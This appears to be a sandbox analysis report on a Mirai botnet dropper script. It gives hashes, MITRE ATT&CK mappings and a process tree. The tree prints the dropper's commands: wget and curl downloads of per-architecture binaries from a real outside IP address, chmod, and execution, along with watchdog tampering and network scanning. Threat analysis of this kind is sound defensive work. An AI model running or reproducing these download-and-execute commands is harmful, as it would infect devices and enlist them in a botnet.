mirai | f31864614b06542c7128c1df20768c2f26464c32be9dd18b5e2c1252b3bb44f1

Analysis

max time kernel
96s
max time network
153s
platform
debian-9_mipsel
resource
debian9-mipsel-20240611-en
resource tags

arch:mipselimage:debian9-mipsel-20240611-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipselsystem
submitted
20-11-2024 00:06

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

8UsA.sh
Size

1KB
MD5

0b5a60057fc9d9ce95ba5cdaab501e68
SHA1

879040e7114865f81dbd3f2fb41409e0cb3b8966
SHA256

f31864614b06542c7128c1df20768c2f26464c32be9dd18b5e2c1252b3bb44f1
SHA512

d97b13f656458456b934ab1cdc205ec4efedebfa8ee98675ba38865e916563487d1fd5c649afad7376f469a60ecd16b7c502c549ac095d8be234f6d9e876f351

Score

10^/10

mirai botnet defense_evasion discovery

Malware Config

Signatures

Mirai
Mirai is a prevalent Linux malware infecting exposed network devices.
botnet mirai
Mirai family
mirai
Contacts a large (152324) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
discovery

Network Service Discovery
T1046
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
discovery

Network Service Discovery
T1046

File and Directory Permissions Modification 1 TTPs 5 IoCs

Adversaries may modify file or directory permissions to evade defenses.

defense_evasion

Linux and Mac File and Directory Permissions Modification

T1222.002

pid	Process
836	chmod
743	chmod
750	chmod
756	chmod
800	chmod

Executes dropped EXE 5 IoCs

ioc	pid	Process
/tmp/3AvA	744	3AvA
/tmp/3AvA	751	3AvA
/tmp/3AvA	757	3AvA
/tmp/3AvA	802	3AvA
/tmp/3AvA	837	3AvA

Modifies Watchdog functionality 1 TTPs 6 IoCs

Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.

defense_evasion

Impair Defenses

T1562

description	ioc	Process
File opened for modification	/dev/misc/watchdog	3AvA
File opened for modification	/dev/watchdog	3AvA
File opened for modification	/dev/misc/watchdog	3AvA
File opened for modification	/dev/watchdog	3AvA
File opened for modification	/dev/misc/watchdog	3AvA
File opened for modification	/dev/watchdog	3AvA

Enumerates active TCP sockets 1 TTPs 3 IoCs

Gets active TCP sockets from /proc virtual filesystem.

discovery

System Network Connections Discovery

T1049

description	ioc	Process
File opened for reading	/proc/net/tcp	3AvA
File opened for reading	/proc/net/tcp	3AvA
File opened for reading	/proc/net/tcp	3AvA

Changes its process name 3 IoCs

description	ioc	pid	Process
Changes the process name, possibly in an attempt to hide itself	hg4me2k01cpc0ff1mdn	757	3AvA
Changes the process name, possibly in an attempt to hide itself	4eccppc1iohkn43452	802	3AvA
Changes the process name, possibly in an attempt to hide itself	3b1memd1bibgdicjc	837	3AvA

Reads system network configuration 1 TTPs 3 IoCs

Uses contents of /proc filesystem to enumerate network settings.

discovery

Internet Connection Discovery

T1016.001

description	ioc	Process
File opened for reading	/proc/net/tcp	3AvA
File opened for reading	/proc/net/tcp	3AvA
File opened for reading	/proc/net/tcp	3AvA

Reads runtime system information 26 IoCs

Reads data from /proc virtual filesystem.

discovery

description	ioc	Process
File opened for reading	/proc/433/exe	3AvA
File opened for reading	/proc/684/exe	3AvA
File opened for reading	/proc/691/exe	3AvA
File opened for reading	/proc/714/exe	3AvA
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/758/exe	3AvA
File opened for reading	/proc/740/exe	3AvA
File opened for reading	/proc/768/exe	3AvA
File opened for reading	/proc/810/exe	3AvA
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/838/exe	3AvA
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/675/exe	3AvA
File opened for reading	/proc/683/exe	3AvA
File opened for reading	/proc/711/exe	3AvA
File opened for reading	/proc/712/exe	3AvA
File opened for reading	/proc/716/exe	3AvA
File opened for reading	/proc/721/exe	3AvA
File opened for reading	/proc/803/exe	3AvA
File opened for reading	/proc/765/exe	3AvA
File opened for reading	/proc/679/exe	3AvA
File opened for reading	/proc/707/exe	3AvA
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/713/exe	3AvA
File opened for reading	/proc/845/exe	3AvA

System Network Configuration Discovery 1 TTPs 4 IoCs

Adversaries may gather information about the network configuration of a system.

discovery

System Network Configuration Discovery

T1016

pid	Process
746	wget
748	curl
749	cat
751	3AvA

Writes file to tmp directory 10 IoCs

Malware often drops required files in the /tmp directory.

description	ioc	Process
File opened for modification	/tmp/IGxModz.x86	wget
File opened for modification	/tmp/IGxModz.mips	wget
File opened for modification	/tmp/IGxModz.mpsl	curl
File opened for modification	/tmp/IGxModz.arm5	wget
File opened for modification	/tmp/IGxModz.arm5	curl
File opened for modification	/tmp/IGxModz.x86	curl
File opened for modification	/tmp/3AvA	8UsA.sh
File opened for modification	/tmp/IGxModz.mips	curl
File opened for modification	/tmp/IGxModz.mpsl	wget
File opened for modification	/tmp/IGxModz.arm4	curl

/tmp/8UsA.sh
/tmp/8UsA.sh
1⤵
- Writes file to tmp directory
PID:714
- /usr/bin/wget
  wget http://154.213.189.14/bns/IGxModz.x86
  2⤵
  - Writes file to tmp directory
  PID:718
- /usr/bin/curl
  curl -O http://154.213.189.14/bns/IGxModz.x86
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:735
- /bin/cat
  cat IGxModz.x86
  2⤵
  PID:742
- /bin/chmod
  chmod +x 3AvA 8UsA.sh IGxModz.x86 systemd-private-85f7faa3808045d8b09bab0ab6f6fc38-systemd-timedated.service-OATWuP
  2⤵
  - File and Directory Permissions Modification
  PID:743
- /tmp/3AvA
  ./3AvA x86
  2⤵
  - Executes dropped EXE
  PID:744
- /usr/bin/wget
  wget http://154.213.189.14/bns/IGxModz.mips
  2⤵
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:746
- /usr/bin/curl
  curl -O http://154.213.189.14/bns/IGxModz.mips
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:748
- /bin/cat
  cat IGxModz.mips
  2⤵
  - System Network Configuration Discovery
  PID:749
- /bin/chmod
  chmod +x 3AvA 8UsA.sh IGxModz.mips IGxModz.x86 systemd-private-85f7faa3808045d8b09bab0ab6f6fc38-systemd-timedated.service-OATWuP
  2⤵
  - File and Directory Permissions Modification
  PID:750
- /tmp/3AvA
  ./3AvA mips
  2⤵
  - Executes dropped EXE
  - System Network Configuration Discovery
  PID:751
- /usr/bin/wget
  wget http://154.213.189.14/bns/IGxModz.mpsl
  2⤵
  - Writes file to tmp directory
  PID:753
- /usr/bin/curl
  curl -O http://154.213.189.14/bns/IGxModz.mpsl
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:754
- /bin/cat
  cat IGxModz.mpsl
  2⤵
  PID:755
- /bin/chmod
  chmod +x 3AvA 8UsA.sh IGxModz.mips IGxModz.mpsl IGxModz.x86 systemd-private-85f7faa3808045d8b09bab0ab6f6fc38-systemd-timedated.service-OATWuP
  2⤵
  - File and Directory Permissions Modification
  PID:756
- /tmp/3AvA
  ./3AvA mpsl
  2⤵
  - Executes dropped EXE
  - Modifies Watchdog functionality
  - Enumerates active TCP sockets
  - Changes its process name
  - Reads system network configuration
  - Reads runtime system information
  PID:757
- /usr/bin/wget
  wget http://154.213.189.14/bns/IGxModz.arm4
  2⤵
  PID:761
- /usr/bin/curl
  curl -O http://154.213.189.14/bns/IGxModz.arm4
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:768
- /bin/chmod
  chmod +x 3AvA 8UsA.sh IGxModz.arm4 IGxModz.mips IGxModz.mpsl IGxModz.x86
  2⤵
  - File and Directory Permissions Modification
  PID:800
- /tmp/3AvA
  ./3AvA arm4
  2⤵
  - Executes dropped EXE
  - Modifies Watchdog functionality
  - Enumerates active TCP sockets
  - Changes its process name
  - Reads system network configuration
  - Reads runtime system information
  PID:802
- /usr/bin/wget
  wget http://154.213.189.14/bns/IGxModz.arm5
  2⤵
  - Writes file to tmp directory
  PID:807
- /usr/bin/curl
  curl -O http://154.213.189.14/bns/IGxModz.arm5
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:817
- /bin/chmod
  chmod +x 3AvA 8UsA.sh IGxModz.arm4 IGxModz.arm5 IGxModz.mips IGxModz.mpsl IGxModz.x86
  2⤵
  - File and Directory Permissions Modification
  PID:836
- /tmp/3AvA
  ./3AvA arm5
  2⤵
  - Executes dropped EXE
  - Modifies Watchdog functionality
  - Enumerates active TCP sockets
  - Changes its process name
  - Reads system network configuration
  - Reads runtime system information
  PID:837
- /usr/bin/wget
  wget http://154.213.189.14/bns/IGxModz.arm6
  2⤵
  PID:841

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

File and Directory Permissions Modification

T1222

Linux and Mac File and Directory Permissions Modification

T1222.002

Impair Defenses

T1562

Credential Access

Discovery

Network Service Discovery

T1046

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

System Network Connections Discovery

T1049

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/tmp/3AvA

Filesize
139KB

MD5
146a0bb5d835cff65a7c8b97ec3145de

SHA1
26569b4ff68b3fc8ed0ca5d17b74a77f159971cd

SHA256
4436f0dd3e6566d029bc495a6035ee2f22c232f6d608370d621d898b2b76d95e

SHA512
5c4f94c060c6e56236f58dec5cdbdad127d0bedf85f76afdd5165d75ec74ee16c54153cb270b1cb0f39c639d0352392d51aa0b25dfef229dea7f892d8e95d13c

Download Submit
/tmp/3AvA

Filesize
132KB

MD5
8a6923c24c3deffaba399ca545c19a45

SHA1
7be6ccbd8be63914c7b1c8a8593829be84d24350

SHA256
bdd82dcb696e7b5f3554f81e2dce89a88a09571ddab8c2c89081511296379d96

SHA512
be86626d2362e5129c6333b8c12040b0d75cce0ecf0e01830abe1b40f43d70fbdd5157df9d709e018ac4381ab6bf7f99b6e1fdb4939e12dbd7da8ab477e7efe1

Download Submit
/tmp/IGxModz.x86

Filesize
68KB

MD5
3babcad0786bd3ac084c3ef8bfeaf14f

SHA1
362e7893d9faa99441e51580e36bc1a8499b0020

SHA256
549428f4edfd5acb557015836a7bad388d5f812aa558c388f313a48aef2b480e

SHA512
a503e6f09705a1f204da65a428983c5c46f395d22ea1c559bc1af0d8d19f2cb8eaced4f87e19d688770ee4f1000da6aa75fbf21f877daa475e9617d891d5e45f

Download Submit

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads